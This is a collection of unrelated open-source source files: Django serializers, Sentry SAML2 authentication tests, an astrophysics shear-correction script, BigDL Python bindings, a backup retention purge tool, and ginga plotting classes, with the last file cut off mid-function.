def read_rgt_test_input(self):
if os.path.isfile(self.get_rgt_input_file_name()):
print("Reading input file")
else:
print("No input found. Provide your own scripts")
@abstractmethod
def make_batch_script(self):
print("I'm making a batch script in the base class")
return
@abstractmethod
def submit_batch_script(self):
print("I'm submitting a batch script in the base class")
return
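# Illustrative sketch (not part of this module): a concrete machine is
# expected to subclass BaseMachine and implement the abstract hooks, e.g.
#
#   class MyCluster(BaseMachine):
#       def read_rgt_test_input(self):
#           ...  # parse self.get_rgt_input_file_name()
#       def make_batch_script(self):
#           ...  # render self.get_scheduler_template_file_name()
#       def submit_batch_script(self):
#           ...  # call self.submit_to_scheduler(batchfilename, unique_id)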
if __name__ == "__main__":
print("This is the BaseMachine class!")
| verolero86/ooh-py | base_machine.py | Python | mit | 7,770 | 0.007336 |
from django.core.urlresolvers import reverse
from rest_framework import serializers
from casenotes.api import CaseNoteSerializer
from .. import models
class ViewTicketSerializer(serializers.ModelSerializer):
case_note = CaseNoteSerializer()
claim_url = serializers.SerializerMethodField()
resolve_url = serializers.SerializerMethodField()
assigned_to = serializers.SlugRelatedField(slug_field='username', read_only=True)
def get_claim_url(self, obj):
return reverse('ditto:ticket_claim', args=(obj.pk,))
def get_resolve_url(self, obj):
return reverse('ditto:ticket_resolve', args=(obj.pk,))
class Meta:
model = models.Ticket
fields = (
'id',
'claim_url',
'resolve_url',
'created_at',
'assigned_to',
'is_resolved',
'case_note',
)
| Kvoti/ditto | ditto/tickets/api/serializers.py | Python | bsd-3-clause | 900 | 0.004444 |
from __future__ import absolute_import
import six
import pytest
import base64
from sentry.utils.compat import mock
from exam import fixture
from six.moves.urllib.parse import urlencode, urlparse, parse_qs
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from sentry.auth.authenticators import TotpInterface
from sentry.auth.providers.saml2.provider import SAML2Provider, Attributes, HAS_SAML2
from sentry.models import (
AuditLogEntry,
AuditLogEntryEvent,
AuthProvider,
Organization,
)
from sentry.testutils import AuthProviderTestCase
from sentry.testutils.helpers import Feature
from sentry.utils.compat import map
dummy_provider_config = {
"idp": {
"entity_id": "https://example.com/saml/metadata/1234",
"x509cert": "foo_x509_cert",
"sso_url": "http://example.com/sso_url",
"slo_url": "http://example.com/slo_url",
},
"attribute_mapping": {
Attributes.IDENTIFIER: "user_id",
Attributes.USER_EMAIL: "email",
Attributes.FIRST_NAME: "first_name",
Attributes.LAST_NAME: "last_name",
},
}
class DummySAML2Provider(SAML2Provider):
def get_saml_setup_pipeline(self):
return []
def build_config(self, state):
return dummy_provider_config
@pytest.mark.skipif(not HAS_SAML2, reason="SAML2 library is not installed")
class AuthSAML2Test(AuthProviderTestCase):
provider = DummySAML2Provider
provider_name = "saml2_dummy"
def setUp(self):
self.user = self.create_user("rick@onehundredyears.com")
self.org = self.create_organization(owner=self.user, name="saml2-org")
# enable require 2FA and enroll user
TotpInterface().enroll(self.user)
self.org.update(flags=models.F("flags").bitor(Organization.flags.require_2fa))
assert self.org.flags.require_2fa.is_set
self.auth_provider = AuthProvider.objects.create(
provider=self.provider_name, config=dummy_provider_config, organization=self.org
)
# The system.url-prefix, which is used to generate absolute URLs, must
# have a TLD for the SAML2 library to consider the URL generated for
# the ACS endpoint valid.
self.url_prefix = settings.SENTRY_OPTIONS.get("system.url-prefix")
settings.SENTRY_OPTIONS.update({"system.url-prefix": "http://testserver.com"})
super(AuthSAML2Test, self).setUp()
def tearDown(self):
# restore url-prefix config
settings.SENTRY_OPTIONS.update({"system.url-prefix": self.url_prefix})
super(AuthSAML2Test, self).tearDown()
@fixture
def login_path(self):
return reverse("sentry-auth-organization", args=["saml2-org"])
@fixture
def acs_path(self):
return reverse("sentry-auth-organization-saml-acs", args=["saml2-org"])
@fixture
def setup_path(self):
return reverse("sentry-organization-auth-provider-settings", args=["saml2-org"])
def test_redirects_to_idp(self):
resp = self.client.post(self.login_path, {"init": True})
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/sso_url"
assert "SAMLRequest" in query
def accept_auth(self, **kargs):
saml_response = self.load_fixture("saml2_auth_response.xml")
saml_response = base64.b64encode(saml_response).decode("utf-8")
# Disable validation of the SAML2 mock response
is_valid = "onelogin.saml2.response.OneLogin_Saml2_Response.is_valid"
with mock.patch(is_valid, return_value=True):
return self.client.post(self.acs_path, {"SAMLResponse": saml_response}, **kargs)
def test_auth_sp_initiated(self):
# Start auth process from SP side
self.client.post(self.login_path, {"init": True})
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
def test_auth_idp_initiated(self):
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
@mock.patch("sentry.auth.helper.logger")
def test_auth_setup(self, auth_log):
self.auth_provider.delete()
self.login_as(self.user)
data = {"init": True, "provider": self.provider_name}
with Feature(["organizations:sso-basic", "organizations:sso-saml2"]):
setup = self.client.post(self.setup_path, data)
assert setup.status_code == 302
redirect = urlparse(setup.get("Location", ""))
assert redirect.path == "/sso_url"
auth = self.accept_auth(follow=True)
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 2
assert messages[0] == "You have successfully linked your account to your SSO provider."
assert messages[1].startswith("SSO has been configured for your organization")
# require 2FA disabled when saml is enabled
org = Organization.objects.get(id=self.org.id)
assert not org.flags.require_2fa.is_set
event = AuditLogEntry.objects.get(
target_object=org.id, event=AuditLogEntryEvent.ORG_EDIT, actor=self.user
)
assert "require_2fa to False when enabling SSO" in event.get_note()
auth_log.info.assert_called_once_with(
"Require 2fa disabled during sso setup", extra={"organization_id": self.org.id}
)
def test_auth_idp_initiated_no_provider(self):
self.auth_provider.delete()
auth = self.accept_auth(follow=True)
assert auth.status_code == 200
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 1
assert messages[0] == "The organization does not exist or does not have SAML SSO enabled."
def test_saml_metadata(self):
path = reverse("sentry-auth-organization-saml-metadata", args=["saml2-org"])
resp = self.client.get(path)
assert resp.status_code == 200
assert resp.get("content-type") == "text/xml"
def test_logout_request(self):
saml_request = self.load_fixture("saml2_slo_request.xml")
saml_request = base64.b64encode(saml_request)
self.login_as(self.user)
path = reverse("sentry-auth-organization-saml-sls", args=["saml2-org"])
path = path + "?" + urlencode({"SAMLRequest": saml_request})
resp = self.client.get(path)
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/slo_url"
assert "SAMLResponse" in query
updated = type(self.user).objects.get(pk=self.user.id)
assert updated.session_nonce != self.user.session_nonce
| beeftornado/sentry | tests/sentry/web/frontend/test_auth_saml2.py | Python | bsd-3-clause | 6,945 | 0.001728 |
#!/usr/bin/env python
from __future__ import print_function, division
import numpy as np
import astropy.cosmology
from astropy import units as u
from astropy import constants as const
def compute_sigma_crit(zl, zs, weights=None, cosmology=None):
"""Compute the critical surface mass density.
Parameters:
===========
zl: float, redshift of the lens
zs: array_like, redshift of the source
cosmology: astropy.cosmology.cosmology, optional, default None will load
astropy default
Returns:
========
sigma_crit: astropy.Quantity, critical surface mass density
"""
zs = np.asarray(zs)
if cosmology is None:
cosmology = astropy.cosmology.default_cosmology.get()
beta = cosmology.angular_diameter_distance_z1z2(zl, zs) \
/ cosmology.angular_diameter_distance(zs)
dl = cosmology.angular_diameter_distance(zl)
avg_beta = np.average(beta, weights=weights)
sigma_crit = const.c**2 / (4 * np.pi * const.G) * 1 / (avg_beta * dl)
return sigma_crit
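# Added note (not original text): the return value implements
#     Sigma_crit = c^2 / (4 * pi * G) * D_s / (D_l * D_ls)
# with beta = D_ls / D_s averaged over the source redshift distribution.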
def correct_delta_sigma(delta_sigma, sigma, sigma_crit):
"""
Correct a Delta Sigma profile for the effect of reduced shear.
Parameters:
===========
delta_sigma: array_like, Delta Sigma Profile
sigma: array_like, Sigma (Surface Mass Density) Profile
sigma_crit: astropy.units.quantity.Quantity, critical SMD
Returns:
========
delta_sigma_corr: Delta Sigma profile corrected for reduced shear
"""
delta_sigma = u.Quantity(delta_sigma, u.solMass / u.pc**2)
sigma = u.Quantity(sigma, u.solMass / u.pc**2)
delta_sigma_corr = delta_sigma / (sigma_crit - sigma) * sigma_crit
return delta_sigma_corr.to(u.solMass / u.pc**2)
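# Added note (not original text): with convergence kappa = Sigma / Sigma_crit,
# the factor applied above, Sigma_crit / (Sigma_crit - Sigma) = 1 / (1 - kappa),
# is the same factor that relates reduced shear to shear, g = gamma / (1 - kappa).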
def read_Nz(fname):
"""
Read Nikea(?) format histogram file for N(z) distribution
Parameters:
===========
fname: str, file name of histogram file
Returns:
========
bin_centers: array_like, center of redshift bins
nz: array_like, effective source number in redshift bin
"""
X = np.loadtxt(fname)
bin_centers = (X[:-1, 0] + X[1:, 0]) / 2
nz = X[:-1, 1]
return bin_centers, nz
def reduced_shear_correction_wrapper(z_bin, richness_bin, radius_bin,
jackknife_bin, zl, delta_sigma,
sigma, cosmology=None):
"""
Wrapper function to perform reduced shear correction on Delta Sigma
Profiles
Parameters:
==========
z_bin: int, redshift bin number
richness_bin: int, richness bin number
radius_bin: int, radius bin number
jackknife_bin: int, jackknife bin number
zl: float, lens redshift
delta_sigma: array_like, Delta Sigma profile
sigma: array_like, Sigma (Surface Mass Density) profile
Returns:
========
corrected_delta_sigma: ndarray, Delta Sigma profile with reduced shear
correction applied [Msun / pc**2]
Note:
=====
The profiles are expected to be in Msun / pc**2 or convertible astropy
quantities.
"""
#fname = "pofz_z{%d}_l{%d}_r{%d}_j{%d}.tab".format(z_bin, richness_bin,
fname = "pofz_z%d_l%d_r%d_j%d.tab"%(z_bin, richness_bin,
radius_bin,
jackknife_bin)
bin_centers, weights = read_Nz(fname)
sigma_crit = compute_sigma_crit(zl, bin_centers, weights,
cosmology=cosmology)
print(sigma_crit.unit)
corrected_delta_sigma = correct_delta_sigma(delta_sigma, sigma,
sigma_crit)
return corrected_delta_sigma.value
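# Illustrative usage sketch (not part of the original script): the redshift
# values and profile numbers below are made up; only the function signatures
# defined above are assumed.
if __name__ == "__main__":
    # Toy source redshift distribution instead of a pofz_*.tab histogram file.
    zbins = np.linspace(0.4, 1.2, 20)
    nz = np.exp(-0.5 * ((zbins - 0.8) / 0.2) ** 2)
    sc = compute_sigma_crit(zl=0.25, zs=zbins, weights=nz)
    print(sc.to(u.solMass / u.pc**2))
    # Apply the reduced-shear correction to a toy Delta Sigma profile.
    delta_sigma = np.array([150.0, 80.0, 40.0])   # Msun / pc^2
    sigma = np.array([300.0, 150.0, 70.0])        # Msun / pc^2
    print(correct_delta_sigma(delta_sigma, sigma, sc))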
|
joergdietrich/reduced_shear_correction
|
reduced_shear_correction.py
|
Python
|
mit
| 3,647 | 0.001097 |
#
# Licensed to Intel Corporation under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# Intel Corporation licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from py4j.protocol import Py4JJavaError
from py4j.java_gateway import JavaObject
from py4j.java_gateway import is_instance_of
from py4j.java_collections import ListConverter, JavaArray, JavaList
from pyspark import RDD, SparkContext
from pyspark.serializers import PickleSerializer, AutoBatchedSerializer
from pyspark.sql import DataFrame, SQLContext
from pyspark.mllib.common import callJavaFunc
from pyspark import SparkConf
if sys.version >= '3':
long = int
unicode = str
class JavaValue(object):
def jvm_class_constructor(self):
name = "create" + self.__class__.__name__
print("creating: " + name)
return name
def __init__(self, bigdl_type="float", *args):
self.value = callBigDlFunc(bigdl_type, self.jvm_class_constructor(),
*args)
self.bigdl_type = bigdl_type
class InferenceResult():
def __init__(self, result, count, method):
self.result = result
self.count = count
self.method = method
def __reduce__(self):
return (InferenceResult, (self.result, self.count, self.method))
def __str__(self):
return "result: %s, count: %s, method: %s" % (
self.result, self.count, self.method)
class PySample(object):
def __init__(self, features, label, features_shape, label_shape,
bigdl_type="float"):
self.features = features
self.label = label
self.features_shape = features_shape
self.label_shape = label_shape
self.bigdl_type = bigdl_type
# features is a ndarray
# label is a ndarray
@classmethod
def from_ndarray(cls, features, label, bigdl_type="float"):
return cls(
features=[float(i) for i in features.ravel()],
label=[float(i) for i in label.ravel()],
features_shape=list(features.shape),
label_shape=list(label.shape) if label.shape else [label.size],
bigdl_type=bigdl_type)
@classmethod
def of(cls, features, label, features_shape, bigdl_type="float"):
return cls(
features=[float(i) for i in features],
label=[float(label)],
features_shape=features_shape,
label_shape=[1],
bigdl_type=bigdl_type)
def __reduce__(self):
return (PySample, (
self.features, self.label, self.features_shape, self.label_shape,
self.bigdl_type))
def __str__(self):
return "features: %s, label: %s," \
"features_shape: %s, label_shape: %s, bigdl_type: %s" % (
self.features, self.label, self.features_shape,
self.label_shape,
self.bigdl_type)
_picklable_classes = [
'LinkedList',
'SparseVector',
'DenseVector',
'DenseMatrix',
'Rating',
'LabeledPoint',
'PySample',
'TestResult'
]
def initEngine(nodeNum, coreNum, bigdl_type="float"):
callBigDlFunc(bigdl_type, "initEngine", nodeNum, coreNum)
def calc_spark_conf(coreNum, nodeNum):
print("coreNum:%s, nodeNum: %s" % (coreNum, nodeNum))
sparkConf = SparkConf()
sparkConf.setExecutorEnv("DL_ENGINE_TYPE", "mklblas")
sparkConf.setExecutorEnv("MKL_DISABLE_FAST_MM", "1")
sparkConf.setExecutorEnv("KMP_BLOCKTIME", "0")
sparkConf.setExecutorEnv("OMP_WAIT_POLICY", "passive")
sparkConf.setExecutorEnv("OMP_NUM_THREADS", "1")
sparkConf.setExecutorEnv("DL_CORE_NUMBER", str(coreNum))
sparkConf.setExecutorEnv("DL_NODE_NUMBER", str(nodeNum))
sparkConf.set("spark.shuffle.blockTransferService", "nio")
sparkConf.set("spark.scheduler.minRegisteredResourcesRatio", "1.0")
return sparkConf
def callBigDlFunc(bigdl_type, name, *args):
""" Call API in PythonBigDLAPI """
sc = SparkContext.getOrCreate()
if bigdl_type == "float":
api = getattr(
sc._jvm.com.intel.analytics.bigdl.python.api.PythonBigDLAPI.ofFloat(),
name)
elif bigdl_type == "double":
api = getattr(
sc._jvm.com.intel.analytics.bigdl.python.api.PythonBigDLAPI.ofDouble(),
name)
else:
raise Exception("Not supported bigdl_type: %s" % bigdl_type)
return callJavaFunc(sc, api, *args)
def _java2py(sc, r, encoding="bytes"):
if isinstance(r, JavaObject):
clsName = r.getClass().getSimpleName()
# convert RDD into JavaRDD
if clsName != 'JavaRDD' and clsName.endswith("RDD"):
r = r.toJavaRDD()
clsName = 'JavaRDD'
if clsName == 'JavaRDD':
jrdd = sc._jvm.SerDe.javaToPython(r)
return RDD(jrdd, sc)
if clsName == 'DataFrame':
return DataFrame(r, SQLContext.getOrCreate(sc))
if is_instance_of(sc._gateway, r,
"com.intel.analytics.bigdl.nn.Container"):
from optim.optimizer import Model
return Model.of(r)
if clsName in _picklable_classes:
r = sc._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.dumps(r)
elif isinstance(r, (JavaArray, JavaList)):
try:
r = sc._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.dumps(
r)
except Py4JJavaError:
            pass  # not picklable
if isinstance(r, (bytearray, bytes)):
r = PickleSerializer().loads(bytes(r), encoding=encoding)
return r
def callJavaFunc(sc, func, *args):
""" Call Java Function """
args = [_py2java(sc, a) for a in args]
result = func(*args)
return _java2py(sc, result)
def _to_java_object_rdd(rdd):
""" Return a JavaRDD of Object by unpickling
    It converts each Python object into a Java object via Pyrolite, whether
    or not the RDD is serialized in batches.
"""
rdd = rdd._reserialize(AutoBatchedSerializer(PickleSerializer()))
return \
rdd.ctx._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.pythonToJava(
rdd._jrdd, True)
def _py2java(sc, obj):
""" Convert Python object into Java """
if isinstance(obj, RDD):
obj = _to_java_object_rdd(obj)
elif isinstance(obj, DataFrame):
obj = obj._jdf
elif isinstance(obj, SparkContext):
obj = obj._jsc
elif isinstance(obj, (list, tuple)):
obj = ListConverter().convert([_py2java(sc, x) for x in obj],
sc._gateway._gateway_client)
elif isinstance(obj, JavaValue):
obj = obj.value
elif isinstance(obj, JavaObject):
pass
elif isinstance(obj, (int, long, float, bool, bytes, unicode)):
pass
else:
data = bytearray(PickleSerializer().dumps(obj))
obj = sc._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.loads(data)
return obj
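# Illustrative sketch (not part of the original module): building a PySample
# from numpy arrays; numpy is assumed to be available although this module
# does not import it itself.
if __name__ == "__main__":
    import numpy as np
    features = np.arange(6, dtype="float32").reshape(2, 3)
    label = np.array([1.0])
    sample = PySample.from_ndarray(features, label)
    print(sample)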
|
zhichao-li/BigDL
|
dl/src/main/python/util/common.py
|
Python
|
apache-2.0
| 7,567 | 0.000529 |
def test_delete_first_group(app):
app.session.login(username="admin", password="secret")
app.group.delete_first_group()
app.session.logout()
|
alexzoo/python
|
selenium_tests/test/test_del_group.py
|
Python
|
apache-2.0
| 156 | 0.00641 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Static()
result.template = "object/static/structure/dantooine/shared_dant_small_mudhut.iff"
result.attribute_template_id = -1
result.stfName("obj_n","unknown_object")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
obi-two/Rebelion
|
data/scripts/templates/object/static/structure/dantooine/shared_dant_small_mudhut.py
|
Python
|
mit
| 457 | 0.04814 |
import pytest
import socket as s
@pytest.fixture
def socket(request):
_socket = s.socket(s.AF_INET, s.SOCK_STREAM)
def socket_teardown():
_socket.close()
request.addfinalizer(socket_teardown)
return _socket
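# Illustrative alternative (not part of the original tests): the same set-up
# and teardown expressed with pytest's yield-fixture style.
@pytest.fixture
def socket_yield_style():
    _socket = s.socket(s.AF_INET, s.SOCK_STREAM)
    yield _socket
    _socket.close()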
def test_server_connect(socket):
socket.connect(('127.0.0.1',8123))
assert socket
if not socket:
raise AssertionError()
|
ainich/politraf
|
_test.py
|
Python
|
mit
| 375 | 0.005333 |
from django import template
register = template.Library()
@register.inclusion_tag('admin/cerci_issue/issue/submit_line.html', takes_context=True)
def submit_issue_row(context):
"""
Displays the row of buttons for delete and save.
"""
opts = context['opts']
change = context['change']
is_popup = context['is_popup']
save_as = context['save_as']
ctx = {
'opts': opts,
'show_delete_link': (not is_popup and context['has_delete_permission']
and change and context.get('show_delete', True)),
'show_save_as_new': not is_popup and change and save_as,
'show_save_and_add_another': context['has_add_permission'] and
not is_popup and (not save_as or context['add']),
'show_save_and_continue': not is_popup and context['has_change_permission'],
'is_popup': is_popup,
'show_save': True
}
if context.get('original') is not None:
ctx['original'] = context['original']
return ctx
|
cercisanat/cercisanat.com
|
cerci_admin/templatetags/issue_submit.py
|
Python
|
gpl-3.0
| 1,033 | 0.00484 |
from django.apps import AppConfig
class MemosConfig(AppConfig):
name = 'memos'
|
a-kirin/Dockerfiles
|
sample01/web/sample01/memos/apps.py
|
Python
|
mit
| 85 | 0 |
# Copyright (c) 2013 Matthieu Huguet
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
from .types import BackupCollection, Backup
def run(config):
backups = get_backup_collection(config.backup_dir)
days = backups.days()
if not days:
return 0
days_to_keep = get_days_to_keep(days, config)
if days_to_keep or config.force:
backups_to_remove = backups.except_days(set(days_to_keep))
backups_to_remove.remove_all(config.noop)
return 0
else:
sys.stderr.write("""
WARNING : With the specified retention rules, all the files in the specified
directory will be deleted. If you only specified -m and / or -w, it means that
no file in the directory matches your retention rules. Please look at the
--day-of-week or --day-of-month options.
If you really know what you are doing, you can use option --force to
remove all your backup files according to your retention rules.
""")
return 1
def get_backup_collection(backup_dir):
daily_backups = BackupCollection()
for file in os.listdir(backup_dir):
fpath = os.path.join(backup_dir, file)
if not os.path.islink(fpath) and os.path.isfile(fpath):
backup = Backup.from_path(fpath)
daily_backups.add(backup)
return daily_backups
def get_days_to_keep(days, config):
days_to_keep = daily_backup_days(days, config.days_retention)
days_to_keep += weekly_backup_days(
days, config.dow, config.weeks_retention)
days_to_keep += monthly_backup_days(
days, config.dom, config.months_retention)
return days_to_keep
def daily_backup_days(days, retention):
return days[:retention]
def weekly_backup_days(days, dow, retention):
weekly_days = [day for day in days if day.isoweekday() == dow]
return weekly_days[:retention]
def monthly_backup_days(days, dom, retention):
monthly_days = [day for day in days if day.day == dom]
return monthly_days[:retention]
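# Illustrative sketch (not part of the original module): exercising the pure
# retention helpers with made-up dates; a newest-first ordering of the days
# list is assumed here.
if __name__ == "__main__":
    import datetime

    days = [datetime.date(2023, 1, d) for d in range(31, 0, -1)]  # newest first
    print(daily_backup_days(days, retention=7))            # 7 most recent days
    print(weekly_backup_days(days, dow=7, retention=4))    # up to 4 Sundays
    print(monthly_backup_days(days, dom=1, retention=3))   # up to 3 first-of-month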
|
madmatah/lapurge
|
lapurge/purge.py
|
Python
|
mit
| 3,000 | 0.000333 |
#
# plots.py -- Utility functions for plotting.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import numpy
import matplotlib as mpl
from matplotlib.figure import Figure
# fix issue of negative numbers rendering incorrectly with default font
mpl.rcParams['axes.unicode_minus'] = False
from ginga.util import iqcalc
from ginga.misc import Callback
class Plot(Callback.Callbacks):
def __init__(self, figure=None, logger=None, width=500, height=500):
Callback.Callbacks.__init__(self)
if figure is None:
figure = Figure()
dpi = figure.get_dpi()
if dpi is None or dpi < 0.1:
dpi = 100
wd_in, ht_in = float(width)/dpi, float(height)/dpi
figure.set_size_inches(wd_in, ht_in)
self.fig = figure
if hasattr(self.fig, 'set_tight_layout'):
self.fig.set_tight_layout(True)
self.logger = logger
self.fontsize = 10
self.ax = None
self.logx = False
self.logy = False
self.xdata = []
self.ydata = []
# For callbacks
for name in ('draw-canvas', ):
self.enable_callback(name)
def get_figure(self):
return self.fig
def get_widget(self):
return self.fig.canvas
def add_axis(self, **kwdargs):
self.ax = self.fig.add_subplot(111, **kwdargs)
return self.ax
def get_axis(self):
return self.ax
def set_axis(self, ax):
self.ax = ax
def set_titles(self, xtitle=None, ytitle=None, title=None,
rtitle=None):
if xtitle is not None:
self.ax.set_xlabel(xtitle)
if ytitle is not None:
self.ax.set_ylabel(ytitle)
if title is not None:
self.ax.set_title(title)
if rtitle is not None:
pass
ax = self.ax
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +
ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
def clear(self):
self.logger.debug('clearing canvas...')
self.ax.cla()
self.xdata = []
self.ydata = []
def draw(self):
self.fig.canvas.draw()
self.make_callback('draw-canvas')
def plot(self, xarr, yarr, xtitle=None, ytitle=None, title=None,
rtitle=None, **kwdargs):
if self.ax is None:
self.add_axis()
if self.logx:
self.ax.set_xscale('log')
if self.logy:
self.ax.set_yscale('log')
self.xdata = xarr
self.ydata = yarr
self.set_titles(xtitle=xtitle, ytitle=ytitle, title=title,
rtitle=rtitle)
self.ax.grid(True)
self.ax.plot(xarr, yarr, **kwdargs)
for item in self.ax.get_xticklabels() + self.ax.get_yticklabels():
item.set_fontsize(self.fontsize)
# Make x axis labels a little more readable
lbls = self.ax.xaxis.get_ticklabels()
for lbl in lbls:
lbl.set(rotation=45, horizontalalignment='right')
#self.fig.tight_layout()
self.draw()
def get_data(self):
return self.fig, self.xdata, self.ydata
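# Illustrative sketch (not part of the original module): minimal standalone use
# of the Plot class with a plain Python logger; an Agg canvas is attached here
# only so that draw() has something to render to.
def _example_basic_plot():
    import logging
    from matplotlib.backends.backend_agg import FigureCanvasAgg

    logger = logging.getLogger("plots-example")
    plot = Plot(logger=logger, width=400, height=300)
    FigureCanvasAgg(plot.get_figure())  # attaches itself as fig.canvas
    plot.add_axis()
    x = numpy.linspace(0.0, 2.0 * numpy.pi, 100)
    plot.plot(x, numpy.sin(x), xtitle='x', ytitle='sin(x)', title='Example')
    return plot.get_figure()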
class HistogramPlot(Plot):
def histogram(self, data, numbins=2048,
xtitle=None, ytitle=None, title=None, rtitle=None):
minval = numpy.nanmin(data)
maxval = numpy.nanmax(data)
substval = (minval + maxval)/2.0
data[numpy.isnan(data)] = substval
dist, bins = numpy.histogram(data, bins=numbins, density=False)
# used with 'steps-post' drawstyle, this gives correct histogram-steps
x = bins
y = numpy.append(dist, dist[-1])
self.clear()
self.plot(x, y, alpha=1.0, linewidth=1.0, linestyle='-',
xtitle=xtitle, ytitle=ytitle, title=title, rtitle=rtitle,
drawstyle='steps-post')
class CutsPlot(Plot):
def cuts(self, data,
xtitle=None, ytitle=None, title=None, rtitle=None,
color=None):
"""data: pixel values along a line.
"""
y = data
x = numpy.arange(len(data))
self.plot(x, y, color=color, drawstyle='steps-mid',
xtitle=xtitle, ytitle=ytitle, title=title, rtitle=rtitle,
alpha=1.0, linewidth=1.0, linestyle='-')
class ContourPlot(Plot):
def __init__(self, *args, **kwargs):
super(ContourPlot, self).__init__(*args, **kwargs)
self.num_contours = 8
self.plot_panx = 0
self.plot_pany = 0
self.plot_zoomlevel = 1.0
self.cmap = "RdYlGn_r"
# decent choices: { bicubic | bilinear | nearest }
self.interpolation = "bilinear"
self.cbar = None
def connect_zoom_callbacks(self):
canvas = self.fig.canvas
connect = canvas.mpl_connect
# These are not ready for prime time...
# connect("motion_notify_event", self.plot_motion_notify)
# connect("button_press_event", self.plot_button_press)
connect("scroll_event", self.plot_scroll)
def _plot_contours(self, x, y, x1, y1, x2, y2, data,
num_contours=None):
# Make a contour plot
if num_contours is None:
num_contours = self.num_contours
# TEMP: until we figure out a more reliable way to remove
# the color bar on all recent versions of matplotlib
self.fig.clf()
self.ax = self.cbar = None
if self.ax is None:
self.add_axis()
ht, wd = data.shape
self.ax.set_aspect('equal', adjustable='box')
self.set_titles(title='Contours')
#self.fig.tight_layout()
# Set pan position in contour plot
self.plot_panx = float(x) / wd
self.plot_pany = float(y) / ht
## # SEE TEMP, above
## # Seems remove() method is not supported for some recent
## # versions of matplotlib
## if self.cbar is not None:
## self.cbar.remove()
self.ax.cla()
self.ax.set_axis_bgcolor('#303030')
try:
im = self.ax.imshow(data, interpolation=self.interpolation,
origin='lower', cmap=self.cmap)
# Create a contour plot
self.xdata = numpy.arange(x1, x2, 1)
self.ydata = numpy.arange(y1, y2, 1)
colors = [ 'black' ] * num_contours
cs = self.ax.contour(self.xdata, self.ydata, data, num_contours,
colors=colors
#cmap=self.cmap
)
## self.ax.clabel(cs, inline=1, fontsize=10,
## fmt='%5.3f', color='cyan')
# Mark the center of the object
self.ax.plot([x], [y], marker='x', ms=20.0,
color='cyan')
if self.cbar is None:
self.cbar = self.fig.colorbar(im, orientation='horizontal',
shrink=0.8, pad=0.07)
else:
self.cbar.update_bruteforce(im)
# Make x axis labels a little more readable
lbls = self.cbar.ax.xaxis.get_ticklabels()
for lbl in lbls:
lbl.set(rotation=45, horizontalalignment='right')
# Set the pan and zoom position & redraw
self.plot_panzoom()
except Exception as e:
self.logger.error("Error making contour plot: %s" % (
str(e)))
def plot_contours_data(self, x, y, data, num_contours=None):
ht, wd = data.shape
self._plot_contours(x, y, 0, 0, wd, ht, data,
num_contours=num_contours)
def plot_contours(self, x, y, radius, image, num_contours=None):
img_data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
## self._plot_contours(x, y, x1, y1, x2, y2, img_data,
## num_contours=num_contours)
cx, cy = x - x1, y - y1
self.plot_contours_data(cx, cy, img_data,
num_contours=num_contours)
def plot_panzoom(self):
ht, wd = len(self.ydata), len(self.xdata)
x = int(self.plot_panx * wd)
y = int(self.plot_pany * ht)
if self.plot_zoomlevel >= 1.0:
scalefactor = 1.0 / self.plot_zoomlevel
elif self.plot_zoomlevel < -1.0:
scalefactor = - self.plot_zoomlevel
else:
            # weird condition? -- reset to 1:1
scalefactor = 1.0
self.plot_zoomlevel = 1.0
xdelta = int(scalefactor * (wd/2.0))
ydelta = int(scalefactor * (ht/2.0))
xlo, xhi = x-xdelta, x+xdelta
# distribute remaining x space from plot
if xlo < 0:
xsh = abs(xlo)
xlo, xhi = 0, min(wd-1, xhi+xsh)
elif xhi >= wd:
xsh = xhi - wd
xlo, xhi = max(0, xlo-xsh), wd-1
self.ax.set_xlim(xlo, xhi)
ylo, yhi = y-ydelta, y+ydelta
# distribute remaining y space from plot
if ylo < 0:
ysh = abs(ylo)
ylo, yhi = 0, min(ht-1, yhi+ysh)
elif yhi >= ht:
